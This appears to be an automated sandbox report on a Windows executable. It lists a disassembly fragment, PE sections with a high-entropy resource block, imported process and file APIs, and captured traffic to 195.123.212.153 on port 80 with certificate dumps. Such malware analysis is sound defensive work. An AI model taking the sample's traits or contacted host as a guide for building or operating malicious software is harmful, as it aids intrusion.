push 004050C1h
call 6037E377h
push 00000001h
dec dword ptr [esp]
push 00405095h
push 00405086h
call 6037D1F9h
test eax, eax
jne 6037C81Dh
push 00000001h
dec dword ptr [esp]
push 00405095h
push 00405086h
call 6037D1DDh
cmp eax, 00000000h
jne 6037C800h
push 004050C1h
call 6037E334h
lea eax, dword ptr [00401E1Eh]
push eax
ret
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add bh, bh
xor eax, 004050CFh
call 6037DFCEh
push dword ptr [004050CFh]
call 6037DFC3h
push dword ptr [004050CFh]
call 6037DFB8h
push dword ptr [004050CFh]
call 6037DFADh
push dword ptr [004050CFh]
call 6037DFA2h
push 004050C1h

Data Directories

NameVirtual AddressVirtual Size Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IMPORT0x477c0x78.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE0x60000xa500.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
IMAGE_DIRECTORY_ENTRY_BASERELOC0x2e200x494.text
IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
IMAGE_DIRECTORY_ENTRY_TLS0x00x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IAT0x40000xf4.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

Sections

NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
.text0x10000x22b40x2400False0.389214409722ump; data5.40831994534IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata0x40000xd460xe00False0.702566964286ump; data6.47140549073IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.data0x50000xd30x200False0.29296875ump; data2.15164446496IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc0x60000xa5000xa600False0.916886295181ump; data7.80697076173IMAGE_SCN_MEM_READ

Resources

NameRVASizeTypeLanguageCountry
RT_DIALOG0x66c00x20ump; dataEnglishUnited States
RT_DIALOG0x66e00x20ump; dataEnglishUnited States
RT_DIALOG0x67000x20ump; dataEnglishUnited States
RT_DIALOG0x67200x20ump; dataEnglishUnited States
RT_DIALOG0x67400x20ump; dataEnglishUnited States
RT_DIALOG0x67600x20ump; dataEnglishUnited States
RT_DIALOG0x67800x20ump; dataEnglishUnited States
RT_DIALOG0x67a00x20ump; dataEnglishUnited States
RT_DIALOG0x67c00x20ump; dataEnglishUnited States
RT_DIALOG0x67e00x20ump; dataEnglishUnited States
RT_DIALOG0x68000x20ump; dataEnglishUnited States
RT_DIALOG0x68200x20ump; dataEnglishUnited States
RT_DIALOG0x68400x20ump; dataEnglishUnited States
RT_DIALOG0x68600x20ump; dataEnglishUnited States
RT_DIALOG0x68800x20ump; dataEnglishUnited States
RT_DIALOG0x68a00x20ump; dataEnglishUnited States
RT_DIALOG0x68c00x20ump; dataEnglishUnited States
RT_DIALOG0x68e00x20ump; dataEnglishUnited States
RT_DIALOG0x69000x20ump; dataEnglishUnited States
RT_DIALOG0x69200x20ump; dataEnglishUnited States
RT_DIALOG0x69400x20ump; dataEnglishUnited States
RT_DIALOG0x69600x20ump; dataEnglishUnited States
RT_DIALOG0x69800x20ump; dataEnglishUnited States
RT_DIALOG0x69a00x20ump; dataEnglishUnited States
RT_DIALOG0x69c00x20ump; dataEnglishUnited States
RT_DIALOG0x69e00x20ump; dataEnglishUnited States
RT_DIALOG0x6a000x20ump; dataEnglishUnited States
RT_DIALOG0x6a200x20ump; dataEnglishUnited States
RT_DIALOG0x6a400x20ump; dataEnglishUnited States
RT_DIALOG0x6a600x20ump; dataEnglishUnited States
RT_DIALOG0x6a800x20ump; dataEnglishUnited States
RT_DIALOG0x6aa00x20ump; dataEnglishUnited States
RT_DIALOG0x6ac00x20ump; dataEnglishUnited States
RT_DIALOG0x6ae00x20ump; dataEnglishUnited States
RT_DIALOG0x6b000x9a00ump; dataEnglishUnited States

Imports

DLLImport
kernel32.dllCloseHandle, GetLocalTime, VirtualFree, DeleteFileA, GetPrivateProfileStringA, LoadLibraryA, CreateProcessA, HeapReAlloc, LoadLibraryExW, WaitForSingleObject, InterlockedDecrement, CopyFileA, FindNextFileA, GetProcAddress, FindResourceExW, ReadConsoleA, GetShortPathNameA, HeapCreate, IsBadWritePtr, GetFileAttributesA
dsprop.dllFindSheet, CrackName, CheckADsError, ErrMsg
wtsapi32.dllWTSSendMessageW, WTSEnumerateServersW, WTSFreeMemory, WTSVirtualChannelOpen, WTSVirtualChannelClose, WTSSetUserConfigW, WTSUnRegisterSessionNotification, WTSTerminateProcess, WTSWaitSystemEvent, WTSVirtualChannelRead
shlwapi.dllUrlIsNoHistoryW, UrlCreateFromPathW, UrlUnescapeA, PathCompactPathW, PathCommonPrefixW, UrlGetLocationW, UrlIsA, UrlCanonicalizeW, UrlUnescapeA, UrlHashW, PathIsRootW, UrlCompareW
crypt32.dllCertDeleteCRLFromStore, CertDuplicateCRLContext, CertFindAttribute, CertFindCRLInStore, CertFindRDNAttr, CertNameToStrW, CertFreeCertificateChain, CertCloseStore, CertCompareCertificate, CryptFindOIDInfo

Possible Origin

Language of compilation systemCountry where language is spokenMap
EnglishUnited States

Network Behavior

Network Port Distribution

TCP Packets

TimestampSource PortDest PortSource IPDest IP
Aug 13, 2018 14:03:00.768953085 MESZ4916480192.168.2.2195.123.212.153
Aug 13, 2018 14:03:00.769715071 MESZ4916580192.168.2.2195.123.212.153
Aug 13, 2018 14:03:01.850606918 MESZ5684253192.168.2.28.8.8.8
Aug 13, 2018 14:03:01.864563942 MESZ53568428.8.8.8192.168.2.2
Aug 13, 2018 14:03:01.874231100 MESZ5344053192.168.2.28.8.8.8
Aug 13, 2018 14:03:01.880124092 MESZ5960553192.168.2.28.8.8.8
Aug 13, 2018 14:03:01.887587070 MESZ53534408.8.8.8192.168.2.2
Aug 13, 2018 14:03:01.893393993 MESZ53596058.8.8.8192.168.2.2
Aug 13, 2018 14:03:01.927644014 MESZ5090053192.168.2.28.8.8.8
Aug 13, 2018 14:03:01.938977003 MESZ5107553192.168.2.28.8.8.8
Aug 13, 2018 14:03:01.940829039 MESZ53509008.8.8.8192.168.2.2
Aug 13, 2018 14:03:01.942336082 MESZ6167453192.168.2.28.8.8.8
Aug 13, 2018 14:03:01.952680111 MESZ53510758.8.8.8192.168.2.2
Aug 13, 2018 14:03:01.956074953 MESZ53616748.8.8.8192.168.2.2
Aug 13, 2018 14:03:03.771714926 MESZ4916480192.168.2.2195.123.212.153
Aug 13, 2018 14:03:03.771804094 MESZ4916580192.168.2.2195.123.212.153
Aug 13, 2018 14:03:05.052207947 MESZ5929153192.168.2.28.8.8.8
Aug 13, 2018 14:03:05.065459013 MESZ53592918.8.8.8192.168.2.2
Aug 13, 2018 14:03:09.808270931 MESZ4916480192.168.2.2195.123.212.153
Aug 13, 2018 14:03:09.808336973 MESZ4916580192.168.2.2195.123.212.153
Aug 13, 2018 14:03:21.811774015 MESZ4916880192.168.2.2195.123.212.153
Aug 13, 2018 14:03:21.826903105 MESZ4916980192.168.2.2195.123.212.153
Aug 13, 2018 14:03:24.812908888 MESZ4916880192.168.2.2195.123.212.153
Aug 13, 2018 14:03:24.833173990 MESZ4916980192.168.2.2195.123.212.153
Aug 13, 2018 14:03:27.330975056 MESZ6305353192.168.2.28.8.8.8
Aug 13, 2018 14:03:27.370923996 MESZ53630538.8.8.8192.168.2.2
Aug 13, 2018 14:03:27.372629881 MESZ49170443192.168.2.2152.199.19.161
Aug 13, 2018 14:03:27.373440027 MESZ49171443192.168.2.2152.199.19.161
Aug 13, 2018 14:03:27.390280008 MESZ44349170152.199.19.161192.168.2.2
Aug 13, 2018 14:03:27.390419960 MESZ49170443192.168.2.2152.199.19.161
Aug 13, 2018 14:03:27.391093969 MESZ44349171152.199.19.161192.168.2.2
Aug 13, 2018 14:03:27.391210079 MESZ49171443192.168.2.2152.199.19.161
Aug 13, 2018 14:03:27.403280973 MESZ49170443192.168.2.2152.199.19.161
Aug 13, 2018 14:03:27.404558897 MESZ49171443192.168.2.2152.199.19.161
Aug 13, 2018 14:03:27.421076059 MESZ44349170152.199.19.161192.168.2.2
Aug 13, 2018 14:03:27.421648026 MESZ44349170152.199.19.161192.168.2.2
Aug 13, 2018 14:03:27.421685934 MESZ44349170152.199.19.161192.168.2.2
Aug 13, 2018 14:03:27.421705961 MESZ44349170152.199.19.161192.168.2.2
Aug 13, 2018 14:03:27.421722889 MESZ44349170152.199.19.161192.168.2.2
Aug 13, 2018 14:03:27.421850920 MESZ49170443192.168.2.2152.199.19.161
Aug 13, 2018 14:03:27.422137976 MESZ44349171152.199.19.161192.168.2.2
Aug 13, 2018 14:03:27.422454119 MESZ44349171152.199.19.161192.168.2.2
Aug 13, 2018 14:03:27.422491074 MESZ44349171152.199.19.161192.168.2.2
Aug 13, 2018 14:03:27.422512054 MESZ44349171152.199.19.161192.168.2.2
Aug 13, 2018 14:03:27.422535896 MESZ44349171152.199.19.161192.168.2.2
Aug 13, 2018 14:03:27.422549009 MESZ49171443192.168.2.2152.199.19.161
Aug 13, 2018 14:03:27.422558069 MESZ44349170152.199.19.161192.168.2.2
Aug 13, 2018 14:03:27.422703028 MESZ44349170152.199.19.161192.168.2.2
Aug 13, 2018 14:03:27.422796965 MESZ44349170152.199.19.161192.168.2.2
Aug 13, 2018 14:03:27.422812939 MESZ49171443192.168.2.2152.199.19.161
Aug 13, 2018 14:03:27.422841072 MESZ49170443192.168.2.2152.199.19.161
Aug 13, 2018 14:03:27.423439026 MESZ49170443192.168.2.2152.199.19.161
Aug 13, 2018 14:03:27.423531055 MESZ44349171152.199.19.161192.168.2.2
Aug 13, 2018 14:03:27.423602104 MESZ44349171152.199.19.161192.168.2.2
Aug 13, 2018 14:03:27.423612118 MESZ49171443192.168.2.2152.199.19.161
Aug 13, 2018 14:03:27.423629999 MESZ44349171152.199.19.161192.168.2.2
Aug 13, 2018 14:03:27.423713923 MESZ49171443192.168.2.2152.199.19.161
Aug 13, 2018 14:03:27.447113991 MESZ49170443192.168.2.2152.199.19.161
Aug 13, 2018 14:03:27.465198040 MESZ44349170152.199.19.161192.168.2.2
Aug 13, 2018 14:03:27.465311050 MESZ49170443192.168.2.2152.199.19.161
Aug 13, 2018 14:03:27.469621897 MESZ49171443192.168.2.2152.199.19.161
Aug 13, 2018 14:03:27.487481117 MESZ44349171152.199.19.161192.168.2.2
Aug 13, 2018 14:03:27.487561941 MESZ49171443192.168.2.2152.199.19.161
Aug 13, 2018 14:03:27.566498041 MESZ49170443192.168.2.2152.199.19.161
Aug 13, 2018 14:03:27.588301897 MESZ44349170152.199.19.161192.168.2.2
Aug 13, 2018 14:03:27.588332891 MESZ44349170152.199.19.161192.168.2.2
Aug 13, 2018 14:03:27.588417053 MESZ49170443192.168.2.2152.199.19.161
Aug 13, 2018 14:03:30.812406063 MESZ4916880192.168.2.2195.123.212.153
Aug 13, 2018 14:03:30.832439899 MESZ4916980192.168.2.2195.123.212.153
Aug 13, 2018 14:04:15.147206068 MESZ49171443192.168.2.2152.199.19.161
Aug 13, 2018 14:04:15.148457050 MESZ49170443192.168.2.2152.199.19.161

UDP Packets

TimestampSource PortDest PortSource IPDest IP
Aug 13, 2018 14:03:01.850606918 MESZ5684253192.168.2.28.8.8.8
Aug 13, 2018 14:03:01.864563942 MESZ53568428.8.8.8192.168.2.2
Aug 13, 2018 14:03:01.874231100 MESZ5344053192.168.2.28.8.8.8
Aug 13, 2018 14:03:01.880124092 MESZ5960553192.168.2.28.8.8.8
Aug 13, 2018 14:03:01.887587070 MESZ53534408.8.8.8192.168.2.2
Aug 13, 2018 14:03:01.893393993 MESZ53596058.8.8.8192.168.2.2
Aug 13, 2018 14:03:01.927644014 MESZ5090053192.168.2.28.8.8.8
Aug 13, 2018 14:03:01.938977003 MESZ5107553192.168.2.28.8.8.8
Aug 13, 2018 14:03:01.940829039 MESZ53509008.8.8.8192.168.2.2
Aug 13, 2018 14:03:01.942336082 MESZ6167453192.168.2.28.8.8.8
Aug 13, 2018 14:03:01.952680111 MESZ53510758.8.8.8192.168.2.2
Aug 13, 2018 14:03:01.956074953 MESZ53616748.8.8.8192.168.2.2
Aug 13, 2018 14:03:05.052207947 MESZ5929153192.168.2.28.8.8.8
Aug 13, 2018 14:03:05.065459013 MESZ53592918.8.8.8192.168.2.2
Aug 13, 2018 14:03:27.330975056 MESZ6305353192.168.2.28.8.8.8
Aug 13, 2018 14:03:27.370923996 MESZ53630538.8.8.8192.168.2.2

DNS Answers

TimestampSource IPDest IPTrans IDReplay CodeNameCNameAddressTypeClass
Aug 13, 2018 14:03:27.370923996 MESZ8.8.8.8192.168.2.20x611aNo error (0)ie9comview.vo.msecnd.netcs9.wpc.v0cdn.netCNAME (Canonical name)IN (0x0001)
Aug 13, 2018 14:03:27.370923996 MESZ8.8.8.8192.168.2.20x611aNo error (0)cs9.wpc.v0cdn.net152.199.19.161A (IP address)IN (0x0001)

HTTPS Packets

TimestampSource PortDest PortSource IPDest IPSubjectIssuerNot BeforeNot AfterRaw
Aug 13, 2018 14:03:27.422796965 MESZ44349170152.199.19.161192.168.2.2CN=*.vo.msecnd.netCN=Microsoft IT TLS CA 2, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=USFri Mar 30 19:48:56 CEST 2018Mon Mar 30 19:48:56 CEST 2020[[ Version: V3 Subject: CN=*.vo.msecnd.net Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 2048 bits modulus: 26650803979259295716290423693905296698157083325048498445836080201188299707993523769983022596768079645285384865155132965572416436152378172025499450880633264224755571468835296223137555283971797334879051618498098440929892959115038801729724039469239084562396320177233195067487817337082459981077208444076525818793397580249136338078721428618161201050325403922256394870562406690344296180719053188791769325712246232155686598548851946583469494216117938492274511053022075022710177237525565910648338744931738281978430913279296706457579042005546769662912351613258485613692711958886470421185755835262239469076692855817140222781347 public exponent: 65537 Validity: [From: Fri Mar 30 19:48:56 CEST 2018, To: Mon Mar 30 19:48:56 CEST 2020] Issuer: CN=Microsoft IT TLS CA 2, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US SerialNumber: [ 20000270 cc6d2533 6ca081b3 59000000 0270cc]Certificate Extensions: 10[1]: ObjectId: 1.3.6.1.4.1.311.21.10 Criticality=falseExtension unknown: DER encoded OCTET string =0000: 04 1A 30 18 30 0A 06 08 2B 06 01 05 05 07 03 02 ..0.0...+.......0010: 30 0A 06 08 2B 06 01 05 05 07 03 01 0...+.......[2]: ObjectId: 1.3.6.1.4.1.311.21.7 Criticality=falseExtension unknown: DER encoded OCTET string =0000: 04 31 30 2F 06 27 2B 06 01 04 01 82 37 15 08 87 .10/.'+.....7...0010: DA 86 75 83 EE D9 01 82 C9 85 1B 81 B5 9E 61 85 ..u...........a.0020: F4 EB 60 81 5D 84 D2 DF 42 82 E7 93 7A 02 01 64 ..`.]...B...z..d0030: 02 01 1D ...[3]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: caIssuers accessLocation: URIName: http://www.microsoft.com/pki/mscorp/Microsoft%20IT%20TLS%20CA%202.crt, accessMethod: ocsp accessLocation: URIName: http://ocsp.msocsp.com]][4]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: 91 9E 3B 44 6C 3D 57 9C 42 77 2A 34 D7 4F D1 CC ..;Dl=W.Bw*4.O..0010: 4A 97 2C DA J.,.]][5]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://mscrl.microsoft.com/pki/mscorp/crl/Microsoft%20IT%20TLS%20CA%202.crl, URIName: http://crl.microsoft.com/pki/mscorp/crl/Microsoft%20IT%20TLS%20CA%202.crl]]][6]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [1.3.6.1.4.1.311.42.1][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 27 68 74 74 70 3A 2F 2F 77 77 77 2E 6D 69 63 .'http://www.mic0010: 72 6F 73 6F 66 74 2E 63 6F 6D 2F 70 6B 69 2F 6D rosoft.com/pki/m0020: 73 63 6F 72 70 2F 63 70 73 scorp/cps]] ]][7]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ clientAuth serverAuth][8]: ObjectId: 2.5.29.15 Criticality=falseKeyUsage [ DigitalSignature Key_Encipherment Data_Encipherment][9]: ObjectId: 2.5.29.17 Criticality=falseSubjectAlternativeName [ DNSName: *.vo.msecnd.net DNSName: *.adn.azureedge.net DNSName: *.ads2.msads.net DNSName: *.aspnetcdn.com DNSName: *.azurecomcdn.net DNSName: *.azureedge.net DNSName: *.azureedge-test.net DNSName: *.cdn.skype.com DNSName: *.cdn.skype.net DNSName: *.cmsresources.windowsphone.com DNSName: *.cmsresources.windowsphone-int.com DNSName: *.dev.skype.com DNSName: *.fms.azureedge.net DNSName: *.microsoft-sbs-domains.com DNSName: *.secure.skypeassets.com DNSName: *.secure.skypeassets.net DNSName: *.wac.azureedge.net DNSName: *.wpc.azureedge.net DNSName: *.ec.azureedge.net DNSName: *.wpc.ec.azureedge.net DNSName: *.wac.ec.azureedge.net DNSName: *.adn.ec.azureedge.net DNSName: *.fms.ec.azureedge.net DNSName: ajax.microsoft.com DNSName: cdnads.msads.net DNSName: cdn-resources.windowsphone.com DNSName: cdn-resources-beta.windowsphone.com DNSName: ecnads1.msn.com DNSName: iecvlist.microsoft.com DNSName: images-cms-pn.windowsphone-int.com DNSName: images-cms-tst.windowsphone-int.com DNSName: lumiahelptipscdn.microsoft.com DNSName: lumiahelptipscdnqa.microsoft.com DNSName: lumiahelptipsmscdn.microsoft.com DNSName: lumiahelptipsmscdnqa.microsoft.com DNSName: montage.msn.com DNSName: mscrl.microsoft.com DNSName: r20swj13mr.microsoft.com DNSName: *.streaming.mediaservices.windows.net DNSName: *.origin.mediaservices.windows.net DNSName: download.sysinternals.com DNSName: amp.azure.net DNSName: rt.ms-studiosmedia.com DNSName: gtm.ms-studiosmedia.com DNSName: *.aisvc.visualstudio.com DNSName: *.cdn.powerbi.com DNSName: dist.asp.net DNSName: embed.powerbi.com DNSName: msitembed.powerbi.com DNSName: dxtembed.powerbi.com DNSName: *.cdn.powerappscdn.net DNSName: downloads.subscriptionsint.tfsallin.net DNSName: download.my.visualstudio.com DNSName: cdn.vsassets.io DNSName: cdnppe.vsassets.io DNSName: stream.microsoft.com DNSName: datafactory.azure.com DNSName: *.cortanaanalytics.com DNSName: do.skype.com DNSName: software-download.office.microsoft.com DNSName: software-download.microsoft.com DNSName: prss.centralvalidation.com DNSName: *.gallerycdn.vsassets.io DNSName: *.gallerycdnppe.vsassets.io DNSName: global.asazure.windows.net DNSName: download.learningdownloadcenter.microsoft.com DNSName: www.videobreakdown.com DNSName: www.breakdown.me DNSName: *.gallerycdntest.vsassets.io DNSName: agavecdn.o365weve-dev.com DNSName: agavecdn.o365weve-ppe.com DNSName: agavecdn.o365weve.com DNSName: download.visualstudio.com DNSName: *.Applicationinsights.net DNSName: *.Applicationinsights.io DNSName: *.Applicationinsights.microsoft.com DNSName: *.sfbassets.com DNSName: *.sfbassets.net DNSName: download.mono-project.com DNSName: *.streaming.media-test.windows-int.net DNSName: *.origin.mediaservices.windows-int.net DNSName: *.mp.microsoft.com DNSName: download.visualstudio.microsoft.com DNSName: software-download.coem.microsoft.com DNSName: cdn.wallet.microsoft-ppe.com DNSName: cdn.wallet.microsoft.com DNSName: vi.microsoft.com DNSName: *.nuget.org DNSName: *.nugettest.org DNSName: cdn.botframework.com DNSName: *.streaming.media.azure.net DNSName: *.streaming.media.azure-test.net DNSName: natick.research.microsoft.com DNSName: quotecenter.microsoft.com DNSName: quotecenter-ppe.microsoft.com DNSName: cdn.cloudappsecurity.com DNSName: *.yammer.com DNSName: *.videoindexer.ai DNSName: *.api.videoindexer.ai][10]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: CD 01 B0 7E 67 61 98 56 52 16 A4 D7 17 C9 AD AE ....ga.VR.......0010: 2A BC B0 76 *..v]]] Algorithm: [SHA256withRSA] Signature:0000: 3F 55 65 AB A9 07 00 4E 0C CB 83 3F 4B 18 6D 39 ?Ue....N...?K.m90010: 16 43 19 BD 48 3B BB CC 9A 13 AD 73 42 8B BA 09 .C..H;.....sB...0020: 72 2E 49 86 78 02 64 85 67 44 39 C7 36 A9 87 15 r.I.x.d.gD9.6...0030: E0 83 E8 AA D0 CA 2C 47 E3 C9 77 D4 08 C2 1E B6 ......,G..w.....0040: 92 AA 54 0B 2B CD 55 A2 C9 29 89 71 11 70 E2 D0 ..T.+.U..).q.p..0050: 52 1F EF 8A 70 83 7A 90 80 35 5F B6 91 D0 CA 18 R...p.z..5_.....0060: E5 04 AC 0B 70 B1 25 4A 7E 4D FA 76 63 FC 45 B8 ....p.%J.M.vc.E.0070: 13 BF 84 C0 A1 CC C9 A9 29 37 8E 70 56 62 05 71 ........)7.pVb.q0080: 18 78 94 DB 1B 10 5B 0E A3 6C 15 F2 B5 BD 49 A1 .x....[..l....I.0090: D9 05 64 42 19 F9 B0 B6 D9 7B 7E E9 04 1D 73 9F ..dB..........s.00A0: 32 08 DD D2 85 C8 70 05 A6 13 3F D0 32 F1 10 6A 2.....p...?.2..j00B0: A7 DF 48 7F C4 24 DB 8D 9A 36 4D 8B 5B 7E 9B FB ..H..$...6M.[...00C0: EA F1 CA E6 40 4C 65 48 11 BF 13 1B D8 BF 00 4B ....@LeH.......K00D0: ED BE BF 27 9F 19 48 26 79 73 92 69 68 48 D1 9F ...'..H&ys.ihH..00E0: FC 51 70 9D 1F A0 7E 1C 5A 87 D3 8C 4E 70 62 E0 .Qp.....Z...Npb.00F0: 56 2A 83 29 BE F6 59 92 57 4F 3D DC 71 8E 0A D4 V*.)..Y.WO=.q...0100: 08 FC EE C6 94 9A 5E 31 7C 27 5F 1E 6D 90 66 0A ......^1.'_.m.f.0110: 3E C3 90 20 48 3C 04 DF B6 2F 3E 70 C6 4A 60 E5 >.. H<.../>p.J`.0120: 20 B1 9B DF 48 2B 88 E5 33 76 FA 0E B5 5A 2D 2F ...H+..3v...Z-/0130: 71 47 05 80 C6 57 A0 14 B6 A5 35 56 9B B6 A6 20 qG...W....5V... 0140: 00 6C 70 4F 2F B6 AD BD F3 EA 5B 60 F5 14 ED 6B .lpO/.....[`...k0150: 6B 44 15 CE 91 2D 7F 36 11 3E 39 EB CC C3 DF A9 kD...-.6.>9.....0160: FB A8 9D 7F 64 94 A5 87 E0 7F 2F 0F 91 56 4E F5 ....d...../..VN.0170: F5 49 9F 9F 8E 6E 13 B4 94 7E 24 A6 B2 E1 F3 DA .I...n....$.....0180: 3E DE EC 5E FB 64 29 DC 57 F3 46 73 07 03 A2 69 >..^.d).W.Fs...i0190: 69 7A 01 0F 2C 72 11 8C 8E 41 DF 6B 93 09 B2 F0 iz..,r...A.k....01A0: DF B1 82 40 2E 1B FD 1C 22 DE EB 6C 2B 89 33 BE ...@...."..l+.3.01B0: 6C 14 2F FC ED 2E 3E B8 D7 B8 45 44 DE AC 64 FA l./...>...ED..d.01C0: 15 8E 95 BB 4E 04 04 75 3D 13 A2 1D 94 7A B8 8E ....N..u=....z..01D0: 24 6D CD 66 E7 40 7E E5 C3 4F BC 22 8A D7 78 A1 $m.f.@...O."..x.01E0: 7C 0A 95 87 55 CC CF 8F 41 57 91 98 E7 AA E7 DE ....U...AW......01F0: C5 C2 0C D1 A1 03 76 BC 82 C6 C9 9E 3F 98 43 7D ......v.....?.C.]
Aug 13, 2018 14:03:27.422796965 MESZ44349170152.199.19.161192.168.2.2CN=Microsoft IT TLS CA 2, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEFri May 20 14:51:57 CEST 2016Mon May 20 14:51:57 CEST 2024[[ Version: V3 Subject: CN=Microsoft IT TLS CA 2, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 4096 bits modulus: 647294255602325793990002513119693468857392867898417605410250896666240868552526284895128080800072075079541116694006108111424285769210952443117016108817512004416915652231910726180601295496484283455657703546650167672472095813058953881613183359786366741204887237778758654131517015592572803423794117451702755161544979434031590265341003857135228312611468237470025540692665622782242245418396439043641638694688252969318505934528611852331845685201979673767756215622457277048995475799862983198559683031746002361975577371668527079660623700395748659568646041541973621714023268935223403435124814495591465766470454743043858485541464708934243998176475016309920664622704013423283337532488437325584305269612425692156906642521785806736108836293408234401329760217850656597482737516435684644509149184860637949964770877674659801402449999763931813660784340254013505819744099600848977200865054274097501530563387171488283923635556233850167978272146006159159364253066097677840315992598562396543614479225118965642333219965644634595301995940368770892345795950122637528531630935913800079064090039488940652767821851441910089798494405128972383400235177579883092457976791664618121612668703609711139468476583630291006864328822405235915054059848188166737876217120001 public exponent: 65537 Validity: [From: Fri May 20 14:51:57 CEST 2016, To: Mon May 20 14:51:57 CEST 2024] Issuer: CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE SerialNumber: [ 0f2c10c9 5b06c093 7fb8d449 f83e8569]Certificate Extensions: 8[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: ocsp accessLocation: URIName: http://ocsp.digicert.com]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: E5 9D 59 30 82 47 58 CC AC FA 08 54 36 86 7B 3A ..Y0.GX....T6..:0010: B5 04 4D F0 ..M.]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:0][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl3.digicert.com/Omniroot2025.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.5.29.32.0][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 1C 68 74 74 70 73 3A 2F 2F 77 77 77 2E 64 69 ..https://www.di0010: 67 69 63 65 72 74 2E 63 6F 6D 2F 43 50 53 gicert.com/CPS]] ]][6]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth clientAuth OCSPSigning][7]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_CertSign Crl_Sign][8]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 91 9E 3B 44 6C 3D 57 9C 42 77 2A 34 D7 4F D1 CC ..;Dl=W.Bw*4.O..0010: 4A 97 2C DA J.,.]]] Algorithm: [SHA256withRSA] Signature:0000: 6C 7F EA 6A 6F CF 6B 5B C1 34 AC FF DC 0E E0 7D l..jo.k[.4......0010: 8B 13 17 E0 2F 4E 59 0E C4 03 B9 F4 05 29 65 47 ..../NY......)eG0020: AE 19 9A E8 54 F6 64 D5 D8 BD 06 E0 71 22 19 7B ....T.d.....q"..0030: CE 9A DD 79 8B DF 70 27 48 68 DB F7 6F 33 19 B5 ...y..p'Hh..o3..0040: 65 EB 9F 90 07 CC B8 47 39 7D 0F 51 13 91 0D 80 e......G9..Q....0050: D4 76 50 2B 85 07 60 6D 6D 59 9A 29 40 16 C6 C7 .vP+..`mmY.)@...0060: 0D E0 6A 57 4B 80 09 BF EF C7 4B 45 57 B3 94 AE ..jWK.....KEW...0070: D7 D2 74 0C 0F 01 83 E9 68 F1 E9 02 97 87 6A D8 ..t.....h.....j.0080: 6D 66 D5 6B 02 BC 50 48 A0 B2 23 77 89 DE 08 B9 mf.k..PH..#w....0090: 46 A3 14 F6 8C 0E 37 96 3D 89 A5 0F D2 32 42 E4 F.....7.=....2B.00A0: 2F 2F 43 5E 3F C9 1D DB 2A 24 34 79 A2 07 22 8F //C^?...*$4y..".00B0: 85 48 5F C5 7E 6D 50 F4 34 2C 3B 91 06 BA 52 5A .H_..mP.4,;...RZ00C0: BD 66 8D 23 0C 4A B5 6A DE 33 49 E1 F8 99 5D 8F .f.#.J.j.3I...].00D0: 30 CD CB C0 85 C1 03 6C 68 E6 C7 5A D5 C9 D4 58 0......lh..Z...X00E0: 9A 37 3E AE 2E 32 07 0B 7B 4B 7E 7C 2B AD DF C3 .7>..2...K..+...00F0: 4C 91 39 7C 17 46 AB 7E 5B 29 6A A5 15 55 4A 2F L.9..F..[)j..UJ/]
